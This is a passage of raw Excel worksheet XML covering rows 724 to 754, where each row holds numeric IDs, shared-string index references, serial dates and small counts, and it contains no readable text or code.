      <c r="C724" s="9" t="s">
        <v>3883</v>
      </c>
      <c r="D724" s="9" t="s">
        <v>2138</v>
      </c>
      <c r="E724" s="9">
        <v>1835379</v>
      </c>
      <c r="F724" s="9" t="s">
        <v>808</v>
      </c>
      <c r="G724" s="10">
        <v>42243.25</v>
      </c>
      <c r="H724" s="9">
        <v>696632</v>
      </c>
      <c r="I724" s="9" t="s">
        <v>3884</v>
      </c>
      <c r="J724" s="10">
        <v>42087.438888888886</v>
      </c>
      <c r="K724" s="3" t="s">
        <v>758</v>
      </c>
      <c r="L724" s="6">
        <v>5</v>
      </c>
      <c r="M724" s="6">
        <v>3</v>
      </c>
      <c r="N724" s="3"/>
      <c r="O724" s="3"/>
      <c r="P724" s="3"/>
      <c r="Q724" s="3" t="s">
        <v>709</v>
      </c>
    </row>
    <row r="725" spans="1:17" ht="14.4" x14ac:dyDescent="0.3">
      <c r="A725" s="9">
        <v>377631</v>
      </c>
      <c r="B725" s="9" t="s">
        <v>1544</v>
      </c>
      <c r="C725" s="9" t="s">
        <v>3885</v>
      </c>
      <c r="D725" s="9" t="s">
        <v>3886</v>
      </c>
      <c r="E725" s="9">
        <v>17674</v>
      </c>
      <c r="F725" s="9" t="s">
        <v>3887</v>
      </c>
      <c r="G725" s="10">
        <v>39801.444444444445</v>
      </c>
      <c r="H725" s="9">
        <v>17674</v>
      </c>
      <c r="I725" s="9" t="s">
        <v>3887</v>
      </c>
      <c r="J725" s="10">
        <v>39801.423611111109</v>
      </c>
      <c r="K725" s="9" t="s">
        <v>1545</v>
      </c>
      <c r="L725" s="7">
        <v>3</v>
      </c>
      <c r="M725" s="7">
        <v>2</v>
      </c>
      <c r="N725" s="9" t="s">
        <v>699</v>
      </c>
    </row>
    <row r="726" spans="1:17" ht="14.4" x14ac:dyDescent="0.3">
      <c r="A726" s="3">
        <v>378675</v>
      </c>
      <c r="B726" s="3" t="s">
        <v>737</v>
      </c>
      <c r="C726" s="9" t="s">
        <v>3888</v>
      </c>
      <c r="D726" s="9" t="s">
        <v>3889</v>
      </c>
      <c r="E726" s="9">
        <v>19679</v>
      </c>
      <c r="F726" s="9" t="s">
        <v>809</v>
      </c>
      <c r="G726" s="10">
        <v>41778.745138888888</v>
      </c>
      <c r="H726" s="9">
        <v>19679</v>
      </c>
      <c r="I726" s="9" t="s">
        <v>809</v>
      </c>
      <c r="J726" s="10">
        <v>41778.745138888888</v>
      </c>
      <c r="K726" s="3" t="s">
        <v>759</v>
      </c>
      <c r="L726" s="6">
        <v>3</v>
      </c>
      <c r="M726" s="6">
        <v>1</v>
      </c>
      <c r="N726" s="3" t="s">
        <v>703</v>
      </c>
      <c r="O726" s="3"/>
      <c r="P726" s="3"/>
      <c r="Q726" s="3"/>
    </row>
    <row r="727" spans="1:17" ht="14.4" x14ac:dyDescent="0.3">
      <c r="A727" s="9">
        <v>378880</v>
      </c>
      <c r="B727" s="9" t="s">
        <v>1546</v>
      </c>
      <c r="C727" s="9" t="s">
        <v>3890</v>
      </c>
      <c r="D727" s="9" t="s">
        <v>3891</v>
      </c>
      <c r="E727" s="9">
        <v>811</v>
      </c>
      <c r="F727" s="9" t="s">
        <v>2372</v>
      </c>
      <c r="G727" s="10">
        <v>39800.807638888888</v>
      </c>
      <c r="H727" s="9">
        <v>1786</v>
      </c>
      <c r="I727" s="9" t="s">
        <v>3892</v>
      </c>
      <c r="J727" s="10">
        <v>39800.804861111108</v>
      </c>
      <c r="K727" s="9" t="s">
        <v>1547</v>
      </c>
      <c r="L727" s="7">
        <v>4</v>
      </c>
      <c r="M727" s="7">
        <v>2</v>
      </c>
      <c r="N727" s="9" t="s">
        <v>702</v>
      </c>
    </row>
    <row r="728" spans="1:17" ht="14.4" x14ac:dyDescent="0.3">
      <c r="A728" s="3">
        <v>379012</v>
      </c>
      <c r="B728" s="3" t="s">
        <v>738</v>
      </c>
      <c r="C728" s="9" t="s">
        <v>3893</v>
      </c>
      <c r="D728" s="9" t="s">
        <v>3894</v>
      </c>
      <c r="E728" s="9">
        <v>9793</v>
      </c>
      <c r="F728" s="9" t="s">
        <v>810</v>
      </c>
      <c r="G728" s="10">
        <v>42279.647916666669</v>
      </c>
      <c r="H728" s="9">
        <v>9793</v>
      </c>
      <c r="I728" s="9" t="s">
        <v>810</v>
      </c>
      <c r="J728" s="10">
        <v>42099.633333333331</v>
      </c>
      <c r="K728" s="3" t="s">
        <v>760</v>
      </c>
      <c r="L728" s="6">
        <v>3</v>
      </c>
      <c r="M728" s="6">
        <v>1</v>
      </c>
      <c r="N728" s="3" t="s">
        <v>701</v>
      </c>
      <c r="O728" s="3"/>
      <c r="P728" s="3"/>
      <c r="Q728" s="3"/>
    </row>
    <row r="729" spans="1:17" ht="14.4" x14ac:dyDescent="0.3">
      <c r="A729" s="9">
        <v>380198</v>
      </c>
      <c r="B729" s="9" t="s">
        <v>1548</v>
      </c>
      <c r="C729" s="9" t="s">
        <v>3895</v>
      </c>
      <c r="D729" s="9" t="s">
        <v>3896</v>
      </c>
      <c r="E729" s="9">
        <v>23427</v>
      </c>
      <c r="F729" s="9" t="s">
        <v>3897</v>
      </c>
      <c r="G729" s="10">
        <v>39801.535416666666</v>
      </c>
      <c r="H729" s="9">
        <v>372</v>
      </c>
      <c r="I729" s="9" t="s">
        <v>3898</v>
      </c>
      <c r="J729" s="10">
        <v>39801.265972222223</v>
      </c>
      <c r="K729" s="9" t="s">
        <v>1549</v>
      </c>
      <c r="L729" s="7">
        <v>3</v>
      </c>
      <c r="M729" s="7">
        <v>1</v>
      </c>
      <c r="N729" s="9" t="s">
        <v>701</v>
      </c>
    </row>
    <row r="730" spans="1:17" ht="14.4" x14ac:dyDescent="0.3">
      <c r="A730" s="9">
        <v>381157</v>
      </c>
      <c r="B730" s="9" t="s">
        <v>1550</v>
      </c>
      <c r="C730" s="9" t="s">
        <v>3899</v>
      </c>
      <c r="D730" s="9" t="s">
        <v>3900</v>
      </c>
      <c r="E730" s="9">
        <v>42229</v>
      </c>
      <c r="F730" s="9" t="s">
        <v>3901</v>
      </c>
      <c r="G730" s="10">
        <v>39829.886111111111</v>
      </c>
      <c r="H730" s="9">
        <v>18804</v>
      </c>
      <c r="I730" s="9" t="s">
        <v>3902</v>
      </c>
      <c r="J730" s="10">
        <v>39801.67083333333</v>
      </c>
      <c r="K730" s="9" t="s">
        <v>1551</v>
      </c>
      <c r="L730" s="7">
        <v>5</v>
      </c>
      <c r="M730" s="7">
        <v>2</v>
      </c>
      <c r="N730" s="9" t="s">
        <v>702</v>
      </c>
      <c r="O730" s="9" t="s">
        <v>699</v>
      </c>
    </row>
    <row r="731" spans="1:17" ht="14.4" x14ac:dyDescent="0.3">
      <c r="A731" s="9">
        <v>381171</v>
      </c>
      <c r="B731" s="9" t="s">
        <v>1552</v>
      </c>
      <c r="C731" s="9" t="s">
        <v>3903</v>
      </c>
      <c r="D731" s="9" t="s">
        <v>3904</v>
      </c>
      <c r="E731" s="9">
        <v>3333</v>
      </c>
      <c r="F731" s="9" t="s">
        <v>3905</v>
      </c>
      <c r="G731" s="10">
        <v>39801.629166666666</v>
      </c>
      <c r="H731" s="9">
        <v>33708</v>
      </c>
      <c r="I731" s="9" t="s">
        <v>3865</v>
      </c>
      <c r="J731" s="10">
        <v>39801.628472222219</v>
      </c>
      <c r="K731" s="9" t="s">
        <v>1553</v>
      </c>
      <c r="L731" s="7">
        <v>6</v>
      </c>
      <c r="M731" s="7">
        <v>4</v>
      </c>
      <c r="N731" s="9" t="s">
        <v>705</v>
      </c>
      <c r="O731" s="9" t="s">
        <v>699</v>
      </c>
    </row>
    <row r="732" spans="1:17" ht="14.4" x14ac:dyDescent="0.3">
      <c r="A732" s="3">
        <v>381274</v>
      </c>
      <c r="B732" s="3" t="s">
        <v>761</v>
      </c>
      <c r="C732" s="9" t="s">
        <v>3906</v>
      </c>
      <c r="D732" s="9" t="s">
        <v>3907</v>
      </c>
      <c r="E732" s="9">
        <v>22674</v>
      </c>
      <c r="F732" s="9" t="s">
        <v>811</v>
      </c>
      <c r="G732" s="10">
        <v>42958.511111111111</v>
      </c>
      <c r="H732" s="9">
        <v>3167040</v>
      </c>
      <c r="I732" s="9" t="s">
        <v>3908</v>
      </c>
      <c r="J732" s="10">
        <v>42958.209027777775</v>
      </c>
      <c r="K732" s="3" t="s">
        <v>762</v>
      </c>
      <c r="L732" s="6">
        <v>8</v>
      </c>
      <c r="M732" s="6">
        <v>6</v>
      </c>
      <c r="N732" s="3" t="s">
        <v>699</v>
      </c>
      <c r="O732" s="3" t="s">
        <v>702</v>
      </c>
      <c r="P732" s="3"/>
      <c r="Q732" s="3"/>
    </row>
    <row r="733" spans="1:17" ht="14.4" x14ac:dyDescent="0.3">
      <c r="A733" s="3">
        <v>381529</v>
      </c>
      <c r="B733" s="3" t="s">
        <v>763</v>
      </c>
      <c r="C733" s="9" t="s">
        <v>3909</v>
      </c>
      <c r="D733" s="9" t="s">
        <v>3910</v>
      </c>
      <c r="E733" s="9">
        <v>419</v>
      </c>
      <c r="F733" s="9" t="s">
        <v>812</v>
      </c>
      <c r="G733" s="10">
        <v>41472.011805555558</v>
      </c>
      <c r="H733" s="9">
        <v>741981</v>
      </c>
      <c r="I733" s="9" t="s">
        <v>3911</v>
      </c>
      <c r="J733" s="10">
        <v>41471.848611111112</v>
      </c>
      <c r="K733" s="3" t="s">
        <v>764</v>
      </c>
      <c r="L733" s="6">
        <v>6</v>
      </c>
      <c r="M733" s="6">
        <v>4</v>
      </c>
      <c r="N733" s="3"/>
      <c r="O733" s="3"/>
      <c r="P733" s="3" t="s">
        <v>710</v>
      </c>
      <c r="Q733" s="3"/>
    </row>
    <row r="734" spans="1:17" ht="14.4" x14ac:dyDescent="0.3">
      <c r="A734" s="9">
        <v>381542</v>
      </c>
      <c r="B734" s="9" t="s">
        <v>1554</v>
      </c>
      <c r="C734" s="9" t="s">
        <v>3912</v>
      </c>
      <c r="D734" s="9" t="s">
        <v>3913</v>
      </c>
      <c r="E734" s="9">
        <v>356</v>
      </c>
      <c r="F734" s="9" t="s">
        <v>3914</v>
      </c>
      <c r="G734" s="10">
        <v>39941.719444444447</v>
      </c>
      <c r="H734" s="9">
        <v>33708</v>
      </c>
      <c r="I734" s="9" t="s">
        <v>3865</v>
      </c>
      <c r="J734" s="10">
        <v>39920.008333333331</v>
      </c>
      <c r="K734" s="9" t="s">
        <v>1555</v>
      </c>
      <c r="L734" s="7">
        <v>11</v>
      </c>
      <c r="M734" s="7">
        <v>9</v>
      </c>
      <c r="N734" s="9" t="s">
        <v>697</v>
      </c>
      <c r="O734" s="9" t="s">
        <v>699</v>
      </c>
    </row>
    <row r="735" spans="1:17" ht="14.4" x14ac:dyDescent="0.3">
      <c r="A735" s="9">
        <v>381545</v>
      </c>
      <c r="B735" s="9" t="s">
        <v>1556</v>
      </c>
      <c r="C735" s="9" t="s">
        <v>3915</v>
      </c>
      <c r="D735" s="9" t="s">
        <v>3916</v>
      </c>
      <c r="E735" s="9">
        <v>1207195</v>
      </c>
      <c r="F735" s="9" t="s">
        <v>3917</v>
      </c>
      <c r="G735" s="10">
        <v>42138.417361111111</v>
      </c>
      <c r="H735" s="9">
        <v>4840746</v>
      </c>
      <c r="I735" s="9" t="s">
        <v>3918</v>
      </c>
      <c r="J735" s="10">
        <v>42135.61041666667</v>
      </c>
      <c r="K735" s="9" t="s">
        <v>1557</v>
      </c>
      <c r="L735" s="7">
        <v>4</v>
      </c>
      <c r="M735" s="7">
        <v>2</v>
      </c>
      <c r="N735" s="9" t="s">
        <v>699</v>
      </c>
    </row>
    <row r="736" spans="1:17" ht="14.4" x14ac:dyDescent="0.3">
      <c r="A736" s="3">
        <v>382547</v>
      </c>
      <c r="B736" s="3" t="s">
        <v>765</v>
      </c>
      <c r="C736" s="9" t="s">
        <v>3919</v>
      </c>
      <c r="D736" s="9" t="s">
        <v>3920</v>
      </c>
      <c r="E736" s="9">
        <v>3043</v>
      </c>
      <c r="F736" s="9" t="s">
        <v>813</v>
      </c>
      <c r="G736" s="10">
        <v>40101.775694444441</v>
      </c>
      <c r="H736" s="9">
        <v>3043</v>
      </c>
      <c r="I736" s="9" t="s">
        <v>813</v>
      </c>
      <c r="J736" s="10">
        <v>40101.775694444441</v>
      </c>
      <c r="K736" s="3" t="s">
        <v>766</v>
      </c>
      <c r="L736" s="6">
        <v>6</v>
      </c>
      <c r="M736" s="6">
        <v>4</v>
      </c>
      <c r="N736" s="3" t="s">
        <v>701</v>
      </c>
      <c r="O736" s="3"/>
      <c r="P736" s="3"/>
      <c r="Q736" s="3"/>
    </row>
    <row r="737" spans="1:17" ht="14.4" x14ac:dyDescent="0.3">
      <c r="A737" s="3">
        <v>383245</v>
      </c>
      <c r="B737" s="3" t="s">
        <v>767</v>
      </c>
      <c r="C737" s="9" t="s">
        <v>3921</v>
      </c>
      <c r="D737" s="9" t="s">
        <v>3922</v>
      </c>
      <c r="E737" s="9">
        <v>707111</v>
      </c>
      <c r="F737" s="9" t="s">
        <v>2481</v>
      </c>
      <c r="G737" s="10">
        <v>41403.635416666664</v>
      </c>
      <c r="H737" s="9">
        <v>517705</v>
      </c>
      <c r="I737" s="9" t="s">
        <v>3923</v>
      </c>
      <c r="J737" s="10">
        <v>41403.620833333334</v>
      </c>
      <c r="K737" s="3" t="s">
        <v>768</v>
      </c>
      <c r="L737" s="6">
        <v>4</v>
      </c>
      <c r="M737" s="6">
        <v>2</v>
      </c>
      <c r="N737" s="3" t="s">
        <v>699</v>
      </c>
      <c r="O737" s="3" t="s">
        <v>702</v>
      </c>
      <c r="P737" s="3" t="s">
        <v>710</v>
      </c>
      <c r="Q737" s="3"/>
    </row>
    <row r="738" spans="1:17" ht="14.4" x14ac:dyDescent="0.3">
      <c r="A738" s="3">
        <v>383712</v>
      </c>
      <c r="B738" s="3" t="s">
        <v>769</v>
      </c>
      <c r="C738" s="9" t="s">
        <v>3924</v>
      </c>
      <c r="D738" s="9" t="s">
        <v>3925</v>
      </c>
      <c r="E738" s="9">
        <v>1364007</v>
      </c>
      <c r="F738" s="9" t="s">
        <v>814</v>
      </c>
      <c r="G738" s="10">
        <v>42408.379166666666</v>
      </c>
      <c r="H738" s="9">
        <v>456813</v>
      </c>
      <c r="I738" s="9" t="s">
        <v>3926</v>
      </c>
      <c r="J738" s="10">
        <v>40894.553472222222</v>
      </c>
      <c r="K738" s="3" t="s">
        <v>770</v>
      </c>
      <c r="L738" s="6">
        <v>3</v>
      </c>
      <c r="M738" s="6">
        <v>1</v>
      </c>
      <c r="N738" s="3"/>
      <c r="O738" s="3"/>
      <c r="P738" s="3"/>
      <c r="Q738" s="3" t="s">
        <v>709</v>
      </c>
    </row>
    <row r="739" spans="1:17" ht="14.4" x14ac:dyDescent="0.3">
      <c r="A739" s="9">
        <v>383728</v>
      </c>
      <c r="B739" s="9" t="s">
        <v>1558</v>
      </c>
      <c r="C739" s="9" t="s">
        <v>3927</v>
      </c>
      <c r="D739" s="9" t="s">
        <v>3928</v>
      </c>
      <c r="E739" s="9" t="s">
        <v>1602</v>
      </c>
      <c r="F739" s="9" t="s">
        <v>3929</v>
      </c>
      <c r="G739" s="10">
        <v>39803.723611111112</v>
      </c>
      <c r="H739" s="9">
        <v>21849</v>
      </c>
      <c r="I739" s="9" t="s">
        <v>3930</v>
      </c>
      <c r="J739" s="10">
        <v>39803.715277777781</v>
      </c>
      <c r="K739" s="9" t="s">
        <v>1559</v>
      </c>
      <c r="L739" s="7">
        <v>6</v>
      </c>
      <c r="M739" s="7">
        <v>4</v>
      </c>
      <c r="N739" s="9" t="s">
        <v>701</v>
      </c>
    </row>
    <row r="740" spans="1:17" ht="14.4" x14ac:dyDescent="0.3">
      <c r="A740" s="9">
        <v>383947</v>
      </c>
      <c r="B740" s="9" t="s">
        <v>1560</v>
      </c>
      <c r="C740" s="9" t="s">
        <v>3931</v>
      </c>
      <c r="D740" s="9" t="s">
        <v>3932</v>
      </c>
      <c r="E740" s="9">
        <v>426671</v>
      </c>
      <c r="F740" s="9" t="s">
        <v>2170</v>
      </c>
      <c r="G740" s="10">
        <v>42816.676388888889</v>
      </c>
      <c r="H740" s="9">
        <v>7275984</v>
      </c>
      <c r="I740" s="9" t="s">
        <v>2102</v>
      </c>
      <c r="J740" s="10">
        <v>42815.834722222222</v>
      </c>
      <c r="K740" s="9" t="s">
        <v>1561</v>
      </c>
      <c r="L740" s="7">
        <v>8</v>
      </c>
      <c r="M740" s="7">
        <v>6</v>
      </c>
      <c r="N740" s="9" t="s">
        <v>698</v>
      </c>
    </row>
    <row r="741" spans="1:17" ht="14.4" x14ac:dyDescent="0.3">
      <c r="A741" s="9">
        <v>384042</v>
      </c>
      <c r="B741" s="9" t="s">
        <v>1562</v>
      </c>
      <c r="C741" s="9" t="s">
        <v>3933</v>
      </c>
      <c r="D741" s="9" t="s">
        <v>3934</v>
      </c>
      <c r="E741" s="9">
        <v>1965</v>
      </c>
      <c r="F741" s="9" t="s">
        <v>2620</v>
      </c>
      <c r="G741" s="10">
        <v>39803.168749999997</v>
      </c>
      <c r="H741" s="9">
        <v>5314</v>
      </c>
      <c r="I741" s="9" t="s">
        <v>3815</v>
      </c>
      <c r="J741" s="10">
        <v>39803.161805555559</v>
      </c>
      <c r="K741" s="9" t="s">
        <v>1563</v>
      </c>
      <c r="L741" s="7">
        <v>4</v>
      </c>
      <c r="M741" s="7">
        <v>2</v>
      </c>
      <c r="N741" s="9" t="s">
        <v>699</v>
      </c>
    </row>
    <row r="742" spans="1:17" ht="14.4" x14ac:dyDescent="0.3">
      <c r="A742" s="3">
        <v>384346</v>
      </c>
      <c r="B742" s="3" t="s">
        <v>771</v>
      </c>
      <c r="C742" s="9" t="s">
        <v>3935</v>
      </c>
      <c r="D742" s="9" t="s">
        <v>3936</v>
      </c>
      <c r="E742" s="9">
        <v>17221</v>
      </c>
      <c r="F742" s="9" t="s">
        <v>815</v>
      </c>
      <c r="G742" s="10">
        <v>41811.338888888888</v>
      </c>
      <c r="H742" s="9">
        <v>1773961</v>
      </c>
      <c r="I742" s="9" t="s">
        <v>3937</v>
      </c>
      <c r="J742" s="10">
        <v>41800.279166666667</v>
      </c>
      <c r="K742" s="3" t="s">
        <v>772</v>
      </c>
      <c r="L742" s="6">
        <v>4</v>
      </c>
      <c r="M742" s="6">
        <v>2</v>
      </c>
      <c r="N742" s="3" t="s">
        <v>700</v>
      </c>
      <c r="O742" s="3" t="s">
        <v>698</v>
      </c>
      <c r="P742" s="3"/>
      <c r="Q742" s="3"/>
    </row>
    <row r="743" spans="1:17" ht="14.4" x14ac:dyDescent="0.3">
      <c r="A743" s="9">
        <v>384502</v>
      </c>
      <c r="B743" s="9" t="s">
        <v>1564</v>
      </c>
      <c r="C743" s="9" t="s">
        <v>3938</v>
      </c>
      <c r="D743" s="9" t="s">
        <v>3939</v>
      </c>
      <c r="E743" s="9">
        <v>1687119</v>
      </c>
      <c r="F743" s="9" t="s">
        <v>3940</v>
      </c>
      <c r="G743" s="10">
        <v>42843.068055555559</v>
      </c>
      <c r="H743" s="9" t="s">
        <v>1602</v>
      </c>
      <c r="I743" s="9" t="s">
        <v>3941</v>
      </c>
      <c r="J743" s="10">
        <v>42843.056944444441</v>
      </c>
      <c r="K743" s="9" t="s">
        <v>1565</v>
      </c>
      <c r="L743" s="7">
        <v>7</v>
      </c>
      <c r="M743" s="7">
        <v>5</v>
      </c>
      <c r="N743" s="9" t="s">
        <v>696</v>
      </c>
    </row>
    <row r="744" spans="1:17" ht="14.4" x14ac:dyDescent="0.3">
      <c r="A744" s="3">
        <v>384844</v>
      </c>
      <c r="B744" s="3" t="s">
        <v>773</v>
      </c>
      <c r="C744" s="9" t="s">
        <v>3942</v>
      </c>
      <c r="D744" s="9" t="s">
        <v>3943</v>
      </c>
      <c r="E744" s="9">
        <v>8272</v>
      </c>
      <c r="F744" s="9" t="s">
        <v>816</v>
      </c>
      <c r="G744" s="10">
        <v>39865.510416666664</v>
      </c>
      <c r="H744" s="9">
        <v>8272</v>
      </c>
      <c r="I744" s="9" t="s">
        <v>816</v>
      </c>
      <c r="J744" s="10">
        <v>39865.509722222225</v>
      </c>
      <c r="K744" s="3" t="s">
        <v>774</v>
      </c>
      <c r="L744" s="6">
        <v>3</v>
      </c>
      <c r="M744" s="6">
        <v>1</v>
      </c>
      <c r="N744" s="3" t="s">
        <v>699</v>
      </c>
      <c r="O744" s="3"/>
      <c r="P744" s="3"/>
      <c r="Q744" s="3"/>
    </row>
    <row r="745" spans="1:17" ht="14.4" x14ac:dyDescent="0.3">
      <c r="A745" s="3">
        <v>384885</v>
      </c>
      <c r="B745" s="3" t="s">
        <v>775</v>
      </c>
      <c r="C745" s="9" t="s">
        <v>3944</v>
      </c>
      <c r="D745" s="9" t="s">
        <v>3945</v>
      </c>
      <c r="E745" s="9">
        <v>14444</v>
      </c>
      <c r="F745" s="9" t="s">
        <v>3946</v>
      </c>
      <c r="G745" s="10">
        <v>39803.904166666667</v>
      </c>
      <c r="H745" s="9">
        <v>14444</v>
      </c>
      <c r="I745" s="9" t="s">
        <v>3946</v>
      </c>
      <c r="J745" s="10">
        <v>39803.90347222222</v>
      </c>
      <c r="K745" s="3" t="s">
        <v>776</v>
      </c>
      <c r="L745" s="6">
        <v>4</v>
      </c>
      <c r="M745" s="6">
        <v>2</v>
      </c>
      <c r="N745" s="3" t="s">
        <v>697</v>
      </c>
      <c r="O745" s="3"/>
      <c r="P745" s="3"/>
      <c r="Q745" s="3"/>
    </row>
    <row r="746" spans="1:17" ht="14.4" x14ac:dyDescent="0.3">
      <c r="A746" s="9">
        <v>385095</v>
      </c>
      <c r="B746" s="9" t="s">
        <v>1566</v>
      </c>
      <c r="C746" s="9" t="s">
        <v>3947</v>
      </c>
      <c r="D746" s="9" t="s">
        <v>3948</v>
      </c>
      <c r="E746" s="9">
        <v>27580</v>
      </c>
      <c r="F746" s="9" t="s">
        <v>3390</v>
      </c>
      <c r="G746" s="10">
        <v>39818.993750000001</v>
      </c>
      <c r="H746" s="9" t="s">
        <v>1602</v>
      </c>
      <c r="I746" s="9" t="s">
        <v>2029</v>
      </c>
      <c r="J746" s="10">
        <v>39810.697222222225</v>
      </c>
      <c r="K746" s="9" t="s">
        <v>1567</v>
      </c>
      <c r="L746" s="7">
        <v>5</v>
      </c>
      <c r="M746" s="7">
        <v>3</v>
      </c>
      <c r="N746" s="9" t="s">
        <v>704</v>
      </c>
    </row>
    <row r="747" spans="1:17" ht="14.4" x14ac:dyDescent="0.3">
      <c r="A747" s="9">
        <v>385298</v>
      </c>
      <c r="B747" s="9" t="s">
        <v>1568</v>
      </c>
      <c r="C747" s="9" t="s">
        <v>3949</v>
      </c>
      <c r="D747" s="9" t="s">
        <v>3950</v>
      </c>
      <c r="E747" s="9">
        <v>45963</v>
      </c>
      <c r="F747" s="9" t="s">
        <v>3951</v>
      </c>
      <c r="G747" s="10">
        <v>39804.581250000003</v>
      </c>
      <c r="H747" s="9">
        <v>45963</v>
      </c>
      <c r="I747" s="9" t="s">
        <v>3951</v>
      </c>
      <c r="J747" s="10">
        <v>39804.086111111108</v>
      </c>
      <c r="K747" s="9" t="s">
        <v>1569</v>
      </c>
      <c r="L747" s="7">
        <v>3</v>
      </c>
      <c r="M747" s="7">
        <v>2</v>
      </c>
      <c r="N747" s="9" t="s">
        <v>703</v>
      </c>
    </row>
    <row r="748" spans="1:17" ht="14.4" x14ac:dyDescent="0.3">
      <c r="A748" s="9">
        <v>385367</v>
      </c>
      <c r="B748" s="9" t="s">
        <v>1570</v>
      </c>
      <c r="C748" s="9" t="s">
        <v>3952</v>
      </c>
      <c r="D748" s="9" t="s">
        <v>3953</v>
      </c>
      <c r="E748" s="9">
        <v>26349</v>
      </c>
      <c r="F748" s="9" t="s">
        <v>3954</v>
      </c>
      <c r="G748" s="10">
        <v>39804.124305555553</v>
      </c>
      <c r="H748" s="9">
        <v>26349</v>
      </c>
      <c r="I748" s="9" t="s">
        <v>3954</v>
      </c>
      <c r="J748" s="10">
        <v>39804.083333333336</v>
      </c>
      <c r="K748" s="9" t="s">
        <v>1571</v>
      </c>
      <c r="L748" s="7">
        <v>2</v>
      </c>
      <c r="M748" s="7">
        <v>1</v>
      </c>
      <c r="Q748" s="9" t="s">
        <v>709</v>
      </c>
    </row>
    <row r="749" spans="1:17" ht="14.4" x14ac:dyDescent="0.3">
      <c r="A749" s="3">
        <v>386597</v>
      </c>
      <c r="B749" s="3" t="s">
        <v>777</v>
      </c>
      <c r="C749" s="9" t="s">
        <v>3955</v>
      </c>
      <c r="D749" s="9" t="s">
        <v>3956</v>
      </c>
      <c r="E749" s="9">
        <v>2548</v>
      </c>
      <c r="F749" s="9" t="s">
        <v>801</v>
      </c>
      <c r="G749" s="10">
        <v>41179.776388888888</v>
      </c>
      <c r="H749" s="9">
        <v>880990</v>
      </c>
      <c r="I749" s="9" t="s">
        <v>3957</v>
      </c>
      <c r="J749" s="10">
        <v>41179.699999999997</v>
      </c>
      <c r="K749" s="3" t="s">
        <v>778</v>
      </c>
      <c r="L749" s="6">
        <v>3</v>
      </c>
      <c r="M749" s="6">
        <v>1</v>
      </c>
      <c r="N749" s="3" t="s">
        <v>702</v>
      </c>
      <c r="O749" s="3"/>
      <c r="P749" s="3"/>
      <c r="Q749" s="3"/>
    </row>
    <row r="750" spans="1:17" ht="14.4" x14ac:dyDescent="0.3">
      <c r="A750" s="9">
        <v>386697</v>
      </c>
      <c r="B750" s="9" t="s">
        <v>1572</v>
      </c>
      <c r="C750" s="9" t="s">
        <v>3958</v>
      </c>
      <c r="D750" s="9" t="s">
        <v>3959</v>
      </c>
      <c r="E750" s="9">
        <v>811</v>
      </c>
      <c r="F750" s="9" t="s">
        <v>2372</v>
      </c>
      <c r="G750" s="10">
        <v>39804.706250000003</v>
      </c>
      <c r="H750" s="9">
        <v>811</v>
      </c>
      <c r="I750" s="9" t="s">
        <v>2372</v>
      </c>
      <c r="J750" s="10">
        <v>39804.705555555556</v>
      </c>
      <c r="K750" s="9" t="s">
        <v>1573</v>
      </c>
      <c r="L750" s="7">
        <v>4</v>
      </c>
      <c r="M750" s="7">
        <v>2</v>
      </c>
      <c r="N750" s="9" t="s">
        <v>703</v>
      </c>
      <c r="O750" s="9" t="s">
        <v>955</v>
      </c>
      <c r="P750" s="9" t="s">
        <v>715</v>
      </c>
      <c r="Q750" s="9" t="s">
        <v>712</v>
      </c>
    </row>
    <row r="751" spans="1:17" ht="14.4" x14ac:dyDescent="0.3">
      <c r="A751" s="3">
        <v>386996</v>
      </c>
      <c r="B751" s="3" t="s">
        <v>779</v>
      </c>
      <c r="C751" s="9" t="s">
        <v>3960</v>
      </c>
      <c r="D751" s="9" t="s">
        <v>3961</v>
      </c>
      <c r="E751" s="9">
        <v>168493</v>
      </c>
      <c r="F751" s="9" t="s">
        <v>817</v>
      </c>
      <c r="G751" s="10">
        <v>41815.51666666667</v>
      </c>
      <c r="H751" s="9">
        <v>168493</v>
      </c>
      <c r="I751" s="9" t="s">
        <v>817</v>
      </c>
      <c r="J751" s="10">
        <v>41815.515972222223</v>
      </c>
      <c r="K751" s="3" t="s">
        <v>780</v>
      </c>
      <c r="L751" s="6">
        <v>3</v>
      </c>
      <c r="M751" s="6">
        <v>1</v>
      </c>
      <c r="N751" s="3" t="s">
        <v>698</v>
      </c>
      <c r="O751" s="3"/>
      <c r="P751" s="3"/>
      <c r="Q751" s="3"/>
    </row>
    <row r="752" spans="1:17" ht="14.4" x14ac:dyDescent="0.3">
      <c r="A752" s="3">
        <v>387289</v>
      </c>
      <c r="B752" s="3" t="s">
        <v>781</v>
      </c>
      <c r="C752" s="9" t="s">
        <v>3962</v>
      </c>
      <c r="D752" s="9" t="s">
        <v>3963</v>
      </c>
      <c r="E752" s="9">
        <v>1446</v>
      </c>
      <c r="F752" s="9" t="s">
        <v>818</v>
      </c>
      <c r="G752" s="10">
        <v>39867.959027777775</v>
      </c>
      <c r="H752" s="9">
        <v>1446</v>
      </c>
      <c r="I752" s="9" t="s">
        <v>818</v>
      </c>
      <c r="J752" s="10">
        <v>39867.959027777775</v>
      </c>
      <c r="K752" s="3" t="s">
        <v>782</v>
      </c>
      <c r="L752" s="6">
        <v>3</v>
      </c>
      <c r="M752" s="6">
        <v>1</v>
      </c>
      <c r="N752" s="3" t="s">
        <v>702</v>
      </c>
      <c r="O752" s="3"/>
      <c r="P752" s="3"/>
      <c r="Q752" s="3"/>
    </row>
    <row r="753" spans="1:17" ht="14.4" x14ac:dyDescent="0.3">
      <c r="A753" s="3">
        <v>387711</v>
      </c>
      <c r="B753" s="3" t="s">
        <v>783</v>
      </c>
      <c r="C753" s="9" t="s">
        <v>3964</v>
      </c>
      <c r="D753" s="9" t="s">
        <v>3965</v>
      </c>
      <c r="E753" s="9">
        <v>13936</v>
      </c>
      <c r="F753" s="9" t="s">
        <v>819</v>
      </c>
      <c r="G753" s="10">
        <v>41865.920138888891</v>
      </c>
      <c r="H753" s="9">
        <v>544075</v>
      </c>
      <c r="I753" s="9" t="s">
        <v>3966</v>
      </c>
      <c r="J753" s="10">
        <v>41865.75</v>
      </c>
      <c r="K753" s="3" t="s">
        <v>784</v>
      </c>
      <c r="L753" s="6">
        <v>3</v>
      </c>
      <c r="M753" s="6">
        <v>1</v>
      </c>
      <c r="N753" s="3" t="s">
        <v>699</v>
      </c>
      <c r="O753" s="3"/>
      <c r="P753" s="3"/>
      <c r="Q753" s="3"/>
    </row>
    <row r="754" spans="1:17" ht="14.4" x14ac:dyDescent="0.3">
      <c r="A754" s="3">
        <v>387733</v>
      </c>
      <c r="B754" s="3" t="s">
        <v>785</v>
      </c>
      <c r="C754" s="9" t="s">
        <v>3967</v>
